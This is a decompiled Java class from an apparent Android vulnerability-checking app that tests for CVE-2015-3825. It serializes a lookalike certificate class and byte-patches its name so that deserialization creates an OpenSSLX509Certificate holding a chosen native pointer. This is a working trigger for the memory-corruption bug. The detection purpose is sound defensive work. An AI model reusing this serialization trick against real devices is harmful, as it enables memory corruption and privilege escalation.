package fuzion24.device.vulnerability.vulnerabilities.framework.serialization;

import android.content.Context;
import android.util.Log;
import com.android.org.conscrypt.ZpenSSLX509Certificate;
import fuzion24.device.vulnerability.vulnerabilities.VulnerabilityTest;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

/* loaded from: classes.dex */
public class OpenSSLTransientBug implements VulnerabilityTest {
    private static final String TAG = "openSSLSerializationBug";

    static {
        System.loadLibrary("x509serializationhelper");
    }

    private native long getPositiveIntLocation();

    @Override // fuzion24.device.vulnerability.vulnerabilities.VulnerabilityTest
    public String getName() {
        return "OpenSSL509 Serialization Bug : CVE-2015-3825";
    }

    @Override // fuzion24.device.vulnerability.vulnerabilities.VulnerabilityTest
    public boolean isVulnerable(Context context) throws Exception {
        Class<?> cls = Class.forName("com.android.org.conscrypt.OpenSSLX509Certificate");
        ObjectStreamClass lookup = ObjectStreamClass.lookup(cls);
        if (lookup == null) {
            Log.d(TAG, "clDESC is null");
            throw new Exception("clDesc is null for OpenSSLECPrivateKey");
        }
        Field declaredField = ZpenSSLX509Certificate.class.getDeclaredField("serialVersionUID");
        declaredField.setAccessible(true);
        declaredField.set(null, Long.valueOf(lookup.getSerialVersionUID()));
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        long positiveIntLocation = getPositiveIntLocation();
        Log.d(TAG, "Decrement address: " + Long.toHexString(positiveIntLocation));
        objectOutputStream.writeObject(new ZpenSSLX509Certificate(positiveIntLocation));
        objectOutputStream.close();
        byte[] byteArray = byteArrayOutputStream.toByteArray();
        int i = 0;
        while (true) {
            if (i < byteArray.length - 4) {
                if (byteArray[i] == 90 && byteArray[i + 1] == 112 && byteArray[i + 2] == 101 && byteArray[i + 3] == 110) {
                    byteArray[i] = 79;
                    break;
                }
                i++;
            } else {
                break;
            }
        }
        ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(byteArray));
        Object readObject = objectInputStream.readObject();
        objectInputStream.close();
        Method declaredMethod = cls.getDeclaredMethod("getContext", new Class[0]);
        declaredMethod.setAccessible(true);
        return ((Long) declaredMethod.invoke(readObject, new Object[0])).longValue() != 0;
    }
}
